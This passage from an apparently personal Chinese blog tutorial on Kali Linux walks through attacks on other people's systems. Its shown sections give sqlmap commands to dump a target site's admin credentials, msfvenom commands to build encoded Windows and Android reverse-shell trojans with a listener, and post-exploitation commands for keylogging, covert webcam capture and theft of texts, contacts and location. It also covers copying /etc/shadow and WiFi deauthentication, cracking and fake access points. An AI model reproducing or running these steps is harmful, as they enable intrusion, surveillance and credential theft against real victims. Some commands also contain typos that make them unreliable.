<li>得到目标网站后台管理员的登录密码<figure class="highlight dsconfig"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">sqlmap </span>-u 目标网站 <span class="built_in">--dump</span> -C <span class="string">"username,password"</span> -T <span class="string">"user"</span></span><br></pre></td></tr></table></figure>
</li>
</ul>
<p>—dump：下载数据<br>-C “username,password” 列名</p>
<h3 id="7-3-PHP渗透"><a href="#7-3-PHP渗透" class="headerlink" title="7.3 PHP渗透"></a>7.3 PHP渗透</h3><p>待更新</p>
<h3 id="7-4-Cookie渗透"><a href="#7-4-Cookie渗透" class="headerlink" title="7.4 Cookie渗透"></a>7.4 Cookie渗透</h3><p>待更新</p>
<h2 id="八、Metasplooit"><a href="#八、Metasplooit" class="headerlink" title="八、Metasplooit"></a>八、Metasplooit</h2><h3 id="8-1-基本操作"><a href="#8-1-基本操作" class="headerlink" title="8.1 基本操作"></a>8.1 基本操作</h3><ul>
<li>启动：msfconsole</li>
<li>漏洞利用工具：exploit</li>
<li>漏洞执行后的demo：payloads</li>
</ul>
<h3 id="8-2-远程控制软件"><a href="#8-2-远程控制软件" class="headerlink" title="8.2 远程控制软件"></a>8.2 远程控制软件</h3><h4 id="8-2-1-实现过程"><a href="#8-2-1-实现过程" class="headerlink" title="8.2.1 实现过程"></a>8.2.1 实现过程</h4><ul>
<li><p>根据自己的ip设定一个木马（旧版使用msfpayload 不是 msfvenom -p），本操作是在桌面路径下执行</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 <span class="attribute">LHOST</span>=kali的ip <span class="attribute">LPORT</span>=55555 -f exe &gt; test.exe</span><br></pre></td></tr></table></figure>
</li>
<li><p>之后会生成一个test.exe木马程序，将文件拖至windows平台上</p>
</li>
<li><p>使用handler模块，本操作以及之后的操作是在msfconsole下执行</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">use</span> exploit/multi/<span class="keyword">handler</span></span><br></pre></td></tr></table></figure>
</li>
<li><p>用shellcode程序</p>
<figure class="highlight gams"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">set</span> PAYLOAD <span class="comment">windows</span>/meterpreter/<span class="comment">reverse_tcp</span></span><br></pre></td></tr></table></figure>
</li>
<li><p>查看</p>
<figure class="highlight ebnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">show options</span></span><br></pre></td></tr></table></figure>
</li>
<li><p>设置参数，比如设置ip和端口</p>
<figure class="highlight gams"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">set</span> LHOST 自己的<span class="comment">ip</span></span><br><span class="line"><span class="keyword">set</span> <span class="comment">LPORT</span> 端口（<span class="comment">55555</span>）</span><br></pre></td></tr></table></figure>
</li>
<li><p>执行并等待目标上钩</p>
<figure class="highlight ebnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">exploit</span></span><br></pre></td></tr></table></figure>
</li>
</ul>
<h4 id="8-2-2-木马基本功能"><a href="#8-2-2-木马基本功能" class="headerlink" title="8.2.2 木马基本功能"></a>8.2.2 木马基本功能</h4><p>当用户点击您的鱼饵之后，您就拥有了对方的所有权限，一下是一些基本的操作：</p>
<ul>
<li>sysinfo：获取到对方设备的系统信息</li>
<li>shell获取受害者的终端权限，通过这个终端您就可以完全控制对方的设备</li>
<li>background：将该权限放到后台，通过session -l（小写字母I） 1来重新获取会话</li>
<li>run vnc：开启远程桌面，执行之后就可以看到对方完整的桌面了。</li>
<li>注入进程</li>
</ul>
<ol>
<li>得到要注入的pid进程：ls</li>
<li>migrate XXX（pid）注入</li>
</ol>
<h3 id="8-2-3-文件管理功能"><a href="#8-2-3-文件管理功能" class="headerlink" title="8.2.3 文件管理功能"></a>8.2.3 文件管理功能</h3><ul>
<li>download      下载文件</li>
<li>edit      编辑文件</li>
<li>cat       查看文件</li>
<li>mkdir     创建文件夹</li>
<li>mv        移动文件</li>
<li>rm        删除文件</li>
<li>upload        上传文件</li>
<li>rmdir     删除文件夹</li>
</ul>
<h3 id="8-2-4-网络及系统操作"><a href="#8-2-4-网络及系统操作" class="headerlink" title="8.2.4 网络及系统操作"></a>8.2.4 网络及系统操作</h3><p>网络操作：</p>
<ul>
<li>arp       看arp缓冲表</li>
<li>ifconfig      ip地址网卡</li>
<li>getproxy      获取代理</li>
<li>netstat       查看端口链接</li>
</ul>
<p>系统操作：</p>
<ul>
<li>kill      杀进程</li>
<li>ps        查看进程表</li>
<li>reboot    重启电脑</li>
<li>reg       修改注册表</li>
<li>shell     获取终端</li>
<li>shutdown  关闭电脑</li>
<li>sysinfo   获取系统信息</li>
</ul>
<h3 id="8-2-5-用户操作和其他功能"><a href="#8-2-5-用户操作和其他功能" class="headerlink" title="8.2.5 用户操作和其他功能"></a>8.2.5 用户操作和其他功能</h3><ul>
<li>enumdesktops      窗体</li>
<li>keyscan_dump      键盘记录—下载</li>
<li>keyscan_start     键盘记录—开始</li>
<li>keyscan_stop      键盘记录—停止</li>
<li>uictl             获取键盘鼠标控制权</li>
<li>record_mic        声音和音频录制</li>
<li>webscan_chat      查看摄像头接口</li>
<li>webscan_list      查看摄像头列表</li>
<li>webscan_stream          查看摄像头获取（偷窥）</li>
<li>getsystem     获取管理员权限</li>
<li>hashdump      下载hash</li>
<li></li>
</ul>
<h2 id="九、安卓渗透"><a href="#九、安卓渗透" class="headerlink" title="九、安卓渗透"></a>九、安卓渗透</h2><h3 id="9-1-实现过程"><a href="#9-1-实现过程" class="headerlink" title="9.1 实现过程"></a>9.1 实现过程</h3><ul>
<li>9.1 在终端根据自己的ip生成安卓木马<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p android/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 <span class="attribute">LHOST</span>=kali的ip <span class="attribute">LPORT</span>=55555 -f apk &gt; test.APK</span><br></pre></td></tr></table></figure>
</li>
</ul>
<p>生成木马之后，我们将木马程序装在手机上即可。在这里呢，也就是我们平时比较常见的未知链接、不明邮件之类的鬼东西。</p>
<ul>
<li><p>9.2 启动Metasplooit</p>
<figure class="highlight ebnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">msfconsole</span></span><br></pre></td></tr></table></figure>
</li>
<li><p>9.3 使用handler</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">use</span> exploit/multi/<span class="keyword">handler</span></span><br></pre></td></tr></table></figure>
</li>
<li><p>9.4 设置安卓木马</p>
<figure class="highlight gams"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">set</span> PAYLOAD <span class="comment">android</span>/meterpreter/<span class="comment">reverse_tcp</span></span><br></pre></td></tr></table></figure>
</li>
<li><p>9.5 查看参数</p>
<figure class="highlight ebnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">show options</span></span><br></pre></td></tr></table></figure>
</li>
<li><p>9.6 设置参数</p>
<figure class="highlight gams"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">set</span> LHOST <span class="comment">192.168.31.147</span></span><br><span class="line"><span class="keyword">set</span> <span class="comment">HPORT 55555</span></span><br></pre></td></tr></table></figure>
</li>
<li><p>9.7 启动监听</p>
<figure class="highlight ebnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">exploit</span></span><br></pre></td></tr></table></figure>
</li>
</ul>
<h3 id="9-2-常见操作"><a href="#9-2-常见操作" class="headerlink" title="9.2 常见操作"></a>9.2 常见操作</h3><ul>
<li>search        搜索文件（.jpg、.png、.bmp之类的文件），这个操作就有点邪恶了，大家一定要注意哦！！！</li>
<li>download      下载（.jpg、.png、.bmp之类的文件，还有你的所有短信、所有电话联系人…………………）</li>
<li>webcam_stream        开启手机摄像头</li>
<li>webcam_snap       启动摄像头进行自动拍照（小心，这里拍照的过程中是不会有任何响应的，也就是说在这个过程中手机主人是不可能有任何察觉的）</li>
<li>check_root    检查ROOT</li>
<li>dump_calllog  下载电话记录</li>
<li>dump_contracts    下载短信记录</li>
<li>geolocat  gps定位</li>
</ul>
<h2 id="十、Fluxion"><a href="#十、Fluxion" class="headerlink" title="十、Fluxion"></a>十、Fluxion</h2><h3 id="10-1-Fluxion下载"><a href="#10-1-Fluxion下载" class="headerlink" title="10.1 Fluxion下载"></a>10.1 Fluxion下载</h3><p>下载fluxion源码并进入fluxion且运行：<br><figure class="highlight vim"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">git clone http<span class="variable">s:</span>//github.<span class="keyword">com</span>/FluxionNetwork/fluxion.git  </span><br><span class="line"><span class="keyword">cd</span> fluxion</span><br><span class="line">./fluxion.<span class="keyword">sh</span></span><br><span class="line">若提示没下载fluxion.<span class="keyword">sh</span>，则按照要求下载就行</span><br></pre></td></tr></table></figure></p>
<h2 id="十一、密码破解"><a href="#十一、密码破解" class="headerlink" title="十一、密码破解"></a>十一、密码破解</h2><ul>
<li><p>查看kali本机的密码字典</p>
<figure class="highlight ebnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">locate wordlist</span></span><br></pre></td></tr></table></figure>
</li>
<li><p>查看某个密码文件</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cat <span class="regexp">/etc/</span>shadow</span><br></pre></td></tr></table></figure>
</li>
<li><p>拷贝/etc/shadow密码文件</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cp <span class="regexp">/etc/</span>shadow<span class="regexp">/ /</span>root<span class="regexp">/Desktop/</span>hash.list</span><br></pre></td></tr></table></figure>
</li>
<li><p>more /etc/login.defs</p>
</li>
</ul>
<h2 id="十二、Hydra"><a href="#十二、Hydra" class="headerlink" title="十二、Hydra"></a>十二、Hydra</h2><p>1</p>
<h2 id="十三、无线破解"><a href="#十三、无线破解" class="headerlink" title="十三、无线破解"></a>十三、无线破解</h2><p>首先做的三步：<br><figure class="highlight smali"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">service network-manager stop</span><br><span class="line">airmon-ng<span class="built_in"> check </span>kill</span><br><span class="line">aiarmon-ng start wlan0</span><br></pre></td></tr></table></figure></p>
<p>开启监听：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">airmon-ng statr wlan0</span><br></pre></td></tr></table></figure></p>
<p>监听所有：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">airodump-ng wlan0mon</span><br></pre></td></tr></table></figure></p>
<p>监听指定bssid：<br><figure class="highlight ada"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">airodump-ng wlan0mon <span class="comment">--bssid XXXX -c 频道 -w wpa(保存名)</span></span><br></pre></td></tr></table></figure></p>
<p>将连接打掉：<br><figure class="highlight accesslog"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">aireplay-ng -<span class="number">0</span> <span class="number">2</span> -a <span class="string">[mac地址]</span> -c <span class="string">[客户端mac地址]</span> wlan0mon</span><br></pre></td></tr></table></figure></p>
<figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ifconfig wlan0mon <span class="meta">down</span></span><br><span class="line">ifconfig wlan0mon <span class="meta">up</span></span><br></pre></td></tr></table></figure>
<p>破解：<br><figure class="highlight accesslog"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">aircrack-ng -w <span class="string">[字典]</span> /root/XXX.cap</span><br></pre></td></tr></table></figure></p>
<p>kali自带常用字典目录：<br><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="regexp">/usr/</span>share<span class="regexp">/john/</span>password.lst</span><br><span class="line"><span class="regexp">/usr/</span>share<span class="regexp">/wfuzz/</span>wordlist<span class="regexp">/</span></span><br></pre></td></tr></table></figure></p>
<p>查看字典文件是否含有该密码：<br><figure class="highlight css"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="selector-tag">grep</span> <span class="selector-tag">Password</span> <span class="selector-tag">password</span><span class="selector-class">.lst</span></span><br></pre></td></tr></table></figure></p>
<p>查看字典有多少行：<br><figure class="highlight 1c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cat [字典] <span class="string">| wc -l</span></span><br></pre></td></tr></table></figure></p>
<p>解压文件：<br><figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gunzip rockyou<span class="selector-class">.txt</span><span class="selector-class">.gz</span></span><br></pre></td></tr></table></figure></p>
<hr>
<p>发现支持wps的AP<br><figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">wash -<span class="selector-tag">i</span> wlan0mon</span><br><span class="line">或者是</span><br><span class="line">airodump-ng wlan0mon --wps</span><br></pre></td></tr></table></figure></p>
<p>爆破pin码：<br><figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">reaver -<span class="selector-tag">i</span> wlan0mon -<span class="selector-tag">b</span> [ap mac] -vv -c [信道]</span><br></pre></td></tr></table></figure></p>
<hr>
<p>wifite</p>
<hr>
<p>伪造wifi：<br><figure class="highlight accesslog"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">airbase-ng -a <span class="string">[ap_mac]</span> -c <span class="string">[信道]</span> --essid <span class="string">[wifi名字]</span> wlan0mon</span><br></pre></td></tr></table></figure></p>
<p>```<br>echo [ap(wifi名)] &gt;essid.txt<br>airolib-ng essid_db —import essid essid.txt<br>airolib-ng essid_db —stats<br>airolib-ng essid_db —import password ./names.txt<br>airolib-ng essid_db —batch<br>aircrack-ng -r essid_fb /root/wpa-01.cap</p>

      
    </div>
    
    
    

    <div>
      
        <div>
    
        <div style="text-align:center;color: #ccc;font-size:18px;">-------------━┳━　━┳━ 本文结束<i class="fa fa-paw"></i>感谢您的阅读 ━┳━　━┳━-------------</div>
    
</div>
      
    </div>


    <div>
      
        
<div class="my_post_copyright">
  <script src="//cdn.bootcss.com/clipboard.js/1.5.10/clipboard.min.js"></script>
  
  <!-- JS库 sweetalert 可修改路径 -->
  <script src="https://cdn.bootcss.com/jquery/2.0.0/jquery.min.js"></script>
  <script src="https://unpkg.com/sweetalert/dist/sweetalert.min.js"></script>
  <p><span>版权描述:</span>创作不易，尊重作者，欢迎转载，转载请保留原文链接及作者于醒目之处。</p>
  <p><span>本文标题:</span><a href="/2018/09/28/Kali/">Kali基本操作</a></p>
  <p><span>文章作者:</span><a href="/" title="访问 Arron Li 的个人博客">Arron Li</a></p>
  <p><span>发布时间:</span>2018年09月28日 - 13:09</p>
  <p><span>最后更新:</span>2019年02月03日 - 00:02</p>
  <p><span>原始链接:</span><a href="/2018/09/28/Kali/" title="Kali基本操作">http://jacklxj.github.io/2018/09/28/Kali/</a>
    <span class="copy-path" title="点击复制文章链接"><i class="fa fa-clipboard" data-clipboard-text="http://jacklxj.github.io/2018/09/28/Kali/" aria-label="复制成功！"></i></span>
  </p>
  <p><span>许可协议:</span><i class="fa fa-creative-commons"></i> <a rel="license" href="https://creativecommons.org/licenses/by-nc-nd/4.0/" target="_blank" title="Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0)">署名-非商业性使用-禁止演绎 4.0 国际</a> 转载请保留原文链接及作者。</p>  
</div>
<script> 
    var clipboard = new Clipboard('.fa-clipboard');
      $(".fa-clipboard").click(function(){
      clipboard.on('success', function(){
        swal({   
          title: "",   
          text: '复制成功',
          icon: "success", 
          showConfirmButton: true
          });
        });
    });  
</script>

      
    </div>


    

    
      <div>
        <div style="padding: 10px 0; margin: 20px auto; width: 90%; text-align: center;">
  <div>坚持分享，您的支持将鼓励我继续创作！</div>
  <button id="rewardButton" disable="enable" onclick="var qr = document.getElementById('QR'); if (qr.style.display === 'none') {qr.style.display='block';} else {qr.style.display='none'}">
    <span>打赏</span>
  </button>
  <div id="QR" style="display: none;">

    
      <div id="wechat" style="display: inline-block">
        <img id="wechat_qr" src="/uploads/wechatpay.png" alt="Arron Li 微信支付">
        <p>微信支付</p>
      </div>
    

    
      <div id="alipay" style="display: inline-block">
        <img id="alipay_qr" src="/uploads/alipay.png" alt="Arron Li 支付宝">
        <p>支付宝</p>
      </div>
    

    

  </div>
</div>

      </div>
    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/09/26/本站须知/" rel="next" title="本站须知">
                <i class="fa fa-chevron-left"></i> 本站须知
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2018/10/12/WIFI破解/" rel="prev" title="WIFI破解">
                WIFI破解 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
        <!--MOB SHARE BEGIN-->
<div class="-mob-share-ui-button -mob-share-open">分享</div>
<div class="-mob-share-ui" style="display: none">
    <ul class="-mob-share-list">
         <li class="-mob-share-qzone"><p>QQ空间</p></li>
         <li class="-mob-share-qq"><p>QQ好友</p></li>
         <li class="-mob-share-weixin"><p>微信</p></li>
         <li class="-mob-share-weibo"><p>新浪微博</p></li>
         <li class="-mob-share-tencentweibo"><p>腾讯微博</p></li>
         <li class="-mob-share-douban"><p>豆瓣</p></li>
         <li class="-mob-share-renren"><p>人人网</p></li>
         <li class="-mob-share-kaixin"><p>开心网</p></li>
         <li class="-mob-share-facebook"><p>Facebook</p></li>
         <li class="-mob-share-twitter"><p>Twitter</p></li>
         <li class="-mob-share-pocket"><p>Pocket</p></li>
         <li class="-mob-share-google"><p>Google+</p></li>
         <li class="-mob-share-youdao"><p>有道云笔记</p></li>
         <li class="-mob-share-mingdao"><p>明道</p></li>
         <li class="-mob-share-pengyou"><p>朋友网</p></li>
         <li class="-mob-share-tumblr"><p>Tumblr</p></li>
         <li class="-mob-share-instapaper"><p>Instapaper</p></li>
         <li class="-mob-share-linkedin"><p>LinkedIn</p></li>
    </ul>
    <div class="-mob-share-close">取消</div>
</div>
<div class="-mob-share-ui-bg"></div>
<script id="-mob-share" src="http://f1.webshare.mob.com/code/mob-share.js?appkey=2a1e20658f942"></script>	
<!--MOB SHARE END-->



      
    </div>
    
  </div>


          </div>
          


          

  
   <div id="gitalk-container"></div>

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/uploads/head.png" alt="Arron Li">
            
              <p class="site-author-name" itemprop="name">Arron Li</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">13</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">6</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">26</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/JackLXJ" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i>GitHub</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="mailto:26647879@qq.com" target="_blank" title="E-Mail">
                      
                        <i class="fa fa-fw fa-envelope"></i>E-Mail</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="http://wpa.qq.com/msgrd?v=3&uin=26647879&site=qq&menu=yes" target="_blank" title="QQ">
                      
                        <i class="fa fa-fw fa-qq"></i>QQ</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="https://y.qq.com/portal/profile.html#stat=y_new.top.user_pic" target="_blank" title="music">
                      
                        <i class="fa fa-fw fa-music"></i>music</a>
                  </span>
                
            </div>
          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#一、换源并安装open-vm-tools"><span class="nav-number">1.</span> <span class="nav-text">一、换源并安装open-vm-tools</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-1-打开sources-list文件"><span class="nav-number">1.1.</span> <span class="nav-text">1.1 打开sources.list文件</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#1-2-在文件中添加如下内容"><span class="nav-number">1.2.</span> <span class="nav-text">1.2 在文件中添加如下内容</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#1-3-更新并安装"><span class="nav-number">1.3.</span> <span class="nav-text">1.3 更新并安装</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#二、安装中文输入"><span class="nav-number">2.</span> <span class="nav-text">二、安装中文输入</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#2-1-下载搜狗"><span class="nav-number">2.1.</span> <span class="nav-text">2.1 下载搜狗</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-2-安装"><span class="nav-number">2.2.</span> <span class="nav-text">2.2 安装</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#三、美化kali"><span class="nav-number">3.</span> <span class="nav-text">三、美化kali</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#四、局域网断网攻击"><span class="nav-number">3.1.</span> <span class="nav-text">四、局域网断网攻击</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4-1-欺骗"><span class="nav-number">3.2.</span> <span class="nav-text">4.1 欺骗</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4-2-攻击"><span class="nav-number">3.3.</span> <span class="nav-text">4.2 攻击</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#4-2-1-瘫痪对方的电脑"><span class="nav-number">3.3.1.</span> <span class="nav-text">4.2.1 瘫痪对方的电脑</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#4-2-2-劫持对方的请求（账号，密码之类的）"><span class="nav-number">3.3.2.</span> <span class="nav-text">4.2.2 劫持对方的请求（账号，密码之类的）</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#4-2-4-嗅探对方的浏览图片"><span class="nav-number">3.3.3.</span> <span class="nav-text">4.2.4 嗅探对方的浏览图片</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#五、https账号、密码获取"><span class="nav-number">4.</span> <span class="nav-text">五、https账号、密码获取</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#5-1-准备工作"><span class="nav-number">4.1.</span> <span class="nav-text">5.1 准备工作</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#5-1-1-Vim：文本编辑器"><span class="nav-number">4.1.1.</span> <span class="nav-text">5.1.1 Vim：文本编辑器</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#5-1-2-开启ssh："><span class="nav-number">4.1.2.</span> <span class="nav-text">5.1.2 开启ssh：</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#5-1-3-sslstrip工具"><span class="nav-number">4.1.3.</span> <span class="nav-text">5.1.3 sslstrip工具</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#5-2-截取账号及密码"><span class="nav-number">4.2.</span> <span class="nav-text">5.2 截取账号及密码</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#六、回话劫持，登录目标站点"><span class="nav-number">5.</span> <span class="nav-text">六、回话劫持，登录目标站点</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#6-1-工具准备"><span class="nav-number">5.1.</span> <span class="nav-text">6.1 工具准备</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#6-2-过程（方法一）"><span class="nav-number">5.2.</span> <span class="nav-text">6.2 过程（方法一）</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#6-3-过程（方法二）"><span class="nav-number">5.3.</span> <span class="nav-text">6.3 过程（方法二）</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#七、SQLMAP注入，ASP、PHP网站渗透"><span class="nav-number">6.</span> <span class="nav-text">七、SQLMAP注入，ASP、PHP网站渗透</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#7-1-科普"><span class="nav-number">6.1.</span> <span class="nav-text">7.1 科普</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#7-1-1-ASP"><span class="nav-number">6.1.1.</span> <span class="nav-text">7.1.1 ASP</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#7-1-2-PHP"><span class="nav-number">6.1.2.</span> <span class="nav-text">7.1.2 PHP</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#7-2-ASP渗透"><span class="nav-number">6.2.</span> <span class="nav-text">7.2 ASP渗透</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#7-3-PHP渗透"><span class="nav-number">6.3.</span> <span class="nav-text">7.3 PHP渗透</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#7-4-Cookie渗透"><span class="nav-number">6.4.</span> <span class="nav-text">7.4 Cookie渗透</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#八、Metasplooit"><span class="nav-number">7.</span> <span class="nav-text">八、Metasplooit</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#8-1-基本操作"><span class="nav-number">7.1.</span> <span class="nav-text">8.1 基本操作</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#8-2-远程控制软件"><span class="nav-number">7.2.</span> <span class="nav-text">8.2 远程控制软件</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#8-2-1-实现过程"><span class="nav-number">7.2.1.</span> <span class="nav-text">8.2.1 实现过程</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#8-2-2-木马基本功能"><span class="nav-number">7.2.2.</span> <span class="nav-text">8.2.2 木马基本功能</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#8-2-3-文件管理功能"><span class="nav-number">7.3.</span> <span class="nav-text">8.2.3 文件管理功能</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#8-2-4-网络及系统操作"><span class="nav-number">7.4.</span> <span class="nav-text">8.2.4 网络及系统操作</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#8-2-5-用户操作和其他功能"><span class="nav-number">7.5.</span> <span class="nav-text">8.2.5 用户操作和其他功能</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#九、安卓渗透"><span class="nav-number">8.</span> <span class="nav-text">九、安卓渗透</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#9-1-实现过程"><span class="nav-number">8.1.</span> <span class="nav-text">9.1 实现过程</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#9-2-常见操作"><span class="nav-number">8.2.</span> <span class="nav-text">9.2 常见操作</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#十、Fluxion"><span class="nav-number">9.</span> <span class="nav-text">十、Fluxion</span></a><ol 